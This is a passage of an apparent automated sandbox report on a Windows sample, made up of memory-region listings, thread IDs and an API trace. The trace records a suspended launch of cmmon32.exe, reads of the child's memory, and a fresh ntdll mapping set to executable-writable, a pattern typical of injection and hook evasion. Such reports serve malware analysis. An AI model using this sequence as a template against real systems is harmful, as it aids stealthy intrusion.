start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1412 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1413 start_va = 0x76910000 end_va = 0x76aacfff entry_point = 0x76910000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1414 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1415 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1416 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1417 start_va = 0x76cf0000 end_va = 0x76de4fff entry_point = 0x76cf0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1418 start_va = 0x76df0000 end_va = 0x76e34fff entry_point = 0x76df0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1419 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1420 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1421 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1422 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1423 start_va = 0x77110000 end_va = 0x77114fff entry_point = 0x77110000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1424 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1425 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1426 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1427 start_va = 0x7ff9c000 end_va = 0x7ff9cfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9c000" filename = "" Region: id = 1428 start_va = 0x7ff9d000 end_va = 0x7ff9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9d000" filename = "" Region: id = 1429 start_va = 0x7ff9e000 end_va = 0x7ff9efff entry_point = 0x0 region_type = private name = "private_0x000000007ff9e000" filename = "" Region: id = 1430 start_va = 0x7ff9f000 end_va = 0x7ff9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff9f000" filename = "" Region: id = 1431 start_va = 0x7ffa0000 end_va = 0x7ffa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa0000" filename = "" Region: id = 1432 start_va = 0x7ffa1000 end_va = 0x7ffa1fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa1000" filename = "" Region: id = 1433 start_va = 0x7ffa2000 end_va = 0x7ffa2fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa2000" filename = "" Region: id = 1434 start_va = 0x7ffa3000 end_va = 0x7ffa3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa3000" filename = "" Region: id = 1435 start_va = 0x7ffa4000 end_va = 0x7ffa4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 1436 start_va = 0x7ffa5000 end_va = 0x7ffa5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa5000" filename = "" Region: id = 1437 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 1438 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 1439 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 1440 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 1441 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 1442 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 1443 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 1444 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 1445 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1446 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 1447 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1448 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1449 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1450 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1451 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1452 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1453 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1454 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1455 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1456 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1457 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1458 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1459 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1460 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1541 start_va = 0x2230000 end_va = 0x2231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002230000" filename = "" Region: id = 1542 start_va = 0x61c10000 end_va = 0x61d29fff entry_point = 0x61c10000 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 1543 start_va = 0x6f190000 end_va = 0x6f1a9fff entry_point = 0x6f190000 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 1544 start_va = 0x6f250000 end_va = 0x6f25efff entry_point = 0x6f250000 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 1709 start_va = 0x61b00000 end_va = 0x61c05fff entry_point = 0x61b00000 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 1710 start_va = 0x6cf60000 end_va = 0x6cf94fff entry_point = 0x6cf60000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1711 start_va = 0x6ead0000 end_va = 0x6eae1fff entry_point = 0x6ead0000 region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll") Region: id = 1712 start_va = 0x22b0000 end_va = 0x22b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022b0000" filename = "" Region: id = 1713 start_va = 0x6e8a0000 end_va = 0x6e8a8fff entry_point = 0x6e8a0000 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 1714 start_va = 0x22c0000 end_va = 0x22c4fff entry_point = 0x22c0000 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 1715 start_va = 0x63a0000 end_va = 0x6536fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000063a0000" filename = "" Region: id = 1716 start_va = 0x6840000 end_va = 0x7203fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006840000" filename = "" Region: id = 1717 start_va = 0x22d0000 end_va = 0x22d3fff entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 1718 start_va = 0x3710000 end_va = 0x384bfff entry_point = 0x3710000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1719 start_va = 0x3990000 end_va = 0x39cffff entry_point = 0x0 region_type = private name = "private_0x0000000003990000" filename = "" Region: id = 1720 start_va = 0x74b30000 end_va = 0x74b6bfff entry_point = 0x74b30000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1721 start_va = 0x7ff9b000 end_va = 0x7ff9bfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9b000" filename = "" Region: id = 1722 start_va = 0x74680000 end_va = 0x74684fff entry_point = 0x74680000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1723 start_va = 0x2390000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 1724 start_va = 0x73280000 end_va = 0x732b7fff entry_point = 0x73280000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1725 start_va = 0x749f0000 end_va = 0x74a33fff entry_point = 0x749f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1726 start_va = 0x22e0000 end_va = 0x231ffff entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1727 start_va = 0x6f010000 end_va = 0x6f015fff entry_point = 0x6f010000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1728 start_va = 0x74b20000 end_va = 0x74b25fff entry_point = 0x74b20000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1856 start_va = 0x2240000 end_va = 0x2242fff entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 1857 start_va = 0x72160000 end_va = 0x72175fff entry_point = 0x72160000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Thread: id = 66 os_tid = 0xaa4 Thread: id = 67 os_tid = 0x9d8 Thread: id = 68 os_tid = 0x9c8 Thread: id = 69 os_tid = 0x64 Thread: id = 70 os_tid = 0x548 Thread: id = 71 os_tid = 0x66c Thread: id = 72 os_tid = 0x5c8 Thread: id = 73 os_tid = 0x664 Thread: id = 74 os_tid = 0x778 Thread: id = 75 os_tid = 0x674 Thread: id = 76 os_tid = 0x18c Thread: id = 77 os_tid = 0x120 Thread: id = 78 os_tid = 0x7e8 Thread: id = 79 os_tid = 0x418 Thread: id = 80 os_tid = 0x160 Thread: id = 81 os_tid = 0x144 Thread: id = 82 os_tid = 0x76c Thread: id = 83 os_tid = 0x760 Thread: id = 84 os_tid = 0x730 Thread: id = 85 os_tid = 0x72c Thread: id = 86 os_tid = 0x728 Thread: id = 87 os_tid = 0x724 Thread: id = 88 os_tid = 0x720 Thread: id = 89 os_tid = 0x714 Thread: id = 90 os_tid = 0x70c Thread: id = 91 os_tid = 0x704 Thread: id = 92 os_tid = 0x6f8 Thread: id = 93 os_tid = 0x644 Thread: id = 94 os_tid = 0x640 Thread: id = 95 os_tid = 0x638 Thread: id = 96 os_tid = 0x634 Thread: id = 97 os_tid = 0x630 Thread: id = 98 os_tid = 0x61c Thread: id = 99 os_tid = 0x614 [0067.310] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1af77c | out: HeapArray=0x1af77c*=0x1f0000) returned 0xf [0067.316] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x1af2d8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0067.317] NtCreateFile (in: FileHandle=0x1af2f8, DesiredAccess=0x120089, ObjectAttributes=0x1af2c0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1af2e0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1af2f8*=0x880, IoStatusBlock=0x1af2e0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0067.326] NtQueryInformationFile (in: FileHandle=0x880, IoStatusBlock=0x1af2e0, FileInformation=0x1af054, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x1af2e0, FileInformation=0x1af054) returned 0x0 [0067.327] NtClose (Handle=0x880) returned 0x0 [0067.351] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\System32\\cmmon32.exe", NtPathName=0x1af514, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\System32\\cmmon32.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0067.351] NtCreateFile (in: FileHandle=0x1af534, DesiredAccess=0x120089, ObjectAttributes=0x1af4fc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\System32\\cmmon32.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1af51c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1af534*=0x880, IoStatusBlock=0x1af51c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0067.395] NtQueryInformationFile (in: FileHandle=0x880, IoStatusBlock=0x1af51c, FileInformation=0x1af474, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1af51c, FileInformation=0x1af474) returned 0x0 [0067.427] NtReadFile (in: FileHandle=0x880, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x1af51c, Buffer=0x3b9f348, BufferLength=0xa800, ByteOffset=0x1af48c*=0, Key=0x0 | out: IoStatusBlock=0x1af51c, Buffer=0x3b9f348*) returned 0x0 [0067.448] NtClose (Handle=0x880) returned 0x0 [0067.449] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\System32\\cmmon32.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1af9f4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af9cc, hNewToken=0x0 | out: lpProcessInformation=0x1af9cc*(hProcess=0x6d4, hThread=0x880, dwProcessId=0xbd4, dwThreadId=0xbd8), hNewToken=0x0) returned 1 [0067.455] NtQueryInformationProcess (in: ProcessHandle=0x6d4, ProcessInformationClass=0x0, ProcessInformation=0x1afa38, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x1afa38, ReturnLength=0x0) returned 0x0 [0067.458] NtReadVirtualMemory (in: ProcessHandle=0x6d4, BaseAddress=0x7ffda008, Buffer=0x1af7c0, NumberOfBytesToRead=0x4, NumberOfBytesRead=0x0 | out: Buffer=0x1af7c0*, NumberOfBytesRead=0x0) returned 0x0 [0078.615] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1afa40 | out: HeapArray=0x1afa40*=0x1f0000) returned 0xf [0078.622] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x1af74c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0078.624] NtCreateFile (in: FileHandle=0x1af76c, DesiredAccess=0x1200a0, ObjectAttributes=0x1af734*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1af754, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1af76c*=0x11a8, IoStatusBlock=0x1af754*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0078.634] NtCreateSection (in: SectionHandle=0x1af6d4, DesiredAccess=0xf, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x10, AllocationAttributes=0x1000000, FileHandle=0x11a8 | out: SectionHandle=0x1af6d4*=0x354) returned 0x0 [0078.636] NtMapViewOfSection (in: SectionHandle=0x354, ProcessHandle=0xffffffff, BaseAddress=0x1af6d0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x1af6cc*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x1af6d0*=0x3710000, SectionOffset=0x0, ViewSize=0x1af6cc*=0x13c000) returned 0x40000003 [0078.638] NtClose (Handle=0x11a8) returned 0x0 [0078.638] NtClose (Handle=0x354) returned 0x0 [0078.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1af784*=0x3710000, NumberOfBytesToProtect=0x1af794, NewAccessProtection=0x40, OldAccessProtection=0x1af780 | out: BaseAddress=0x1af784*=0x3710000, NumberOfBytesToProtect=0x1af794, OldAccessProtection=0x1af780*=0x2) returned 0x0 [0078.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1af778*=0x3711000, NumberOfBytesToProtect=0x1af77c, NewAccessProtection=0x40, OldAccessProtection=0x1af780 | out: BaseAddress=0x1af778*=0x3711000, NumberOfBytesToProtect=0x1af77c, OldAccessProtection=0x1af780*=0x20) returned 0x0 [0078.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1af778*=0x37e6000, NumberOfBytesToProtect=0x1af77c, NewAccessProtection=0x40, OldAccessProtection=0x1af780 | out: BaseAddress=0x1af778*=0x37e6000, NumberOfBytesToProtect=0x1af77c, OldAccessProtection=0x1af780*=0x20) returned 0x0 [0078.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1af778*=0x37e7000, NumberOfBytesToProtect=0x1af77c, NewAccessProtection=0x40, OldAccessProtection=0x1af780 | out: BaseAddress=0x1af778*=0x37e7000, NumberOfBytesToProtect=0x1af77c, OldAccessProtection=0x1af780*=0x8) returned 0x0 [0078.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1af778*=0x37f0000, NumberOfBytesToProtect=0x1af77c, NewAccessProtection=0x40, OldAccessProtection=0x1af780 | out: BaseAddress=0x1af778*=0x37f0000, NumberOfBytesToProtect=0x1af77c, OldAccessProtection=0x1af780*=0x2) returned 0x0 [0078.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1af778*=0x3847000, NumberOfBytesToProtect=0x1af77c, NewAccessProtection=0x40, OldAccessProtection=0x1af780 | out: BaseAddress=0x1af778*=0x3847000, NumberOfBytesToProtect=0x1af77c, OldAccessProtection=0x1af780*=0x2) returned 0x0 [0078.666] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1af76c | out: HeapArray=0x1af76c*=0x1f0000) returned 0xf [0078.708] NtAllocateVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x1af030*=0x0, ZeroBits=0x0, RegionSize=0x1af034*=0x3c08, AllocationType=0x3000, Protect=0x4) Thread: id = 125 os_tid = 0xcc0 Process: id = "8" image_name = "cmmon32.exe" filename = "c:\\windows\\system32\\cmmon32.exe" page_root = "0x7f1e6700" os_pid = "0xbd4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x610" cmd_line = "\"C:\\Windows\\System32\\cmmon32.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1464 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1465 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1466 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1467 start_va = 0x50000 end_va = 0x79fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1468 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1469 start_va = 0xef0000 end_va = 0xefcfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 1470 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1471 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1472 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1473 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1474 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1475 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1476 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1477 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1478 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 1479 start_va = 0x6f260000 end_va = 0x6f26dfff entry_point = 0x6f260000 region_type = mapped_file name = "cmutil.dll" filename = "\\Windows\\System32\\cmutil.dll" (normalized: "c:\\windows\\system32\\cmutil.dll") Region: id = 1480 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1481 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1482 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1483 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1484 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1485 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1486 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1487 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1488 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1489 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1490 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1491 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: 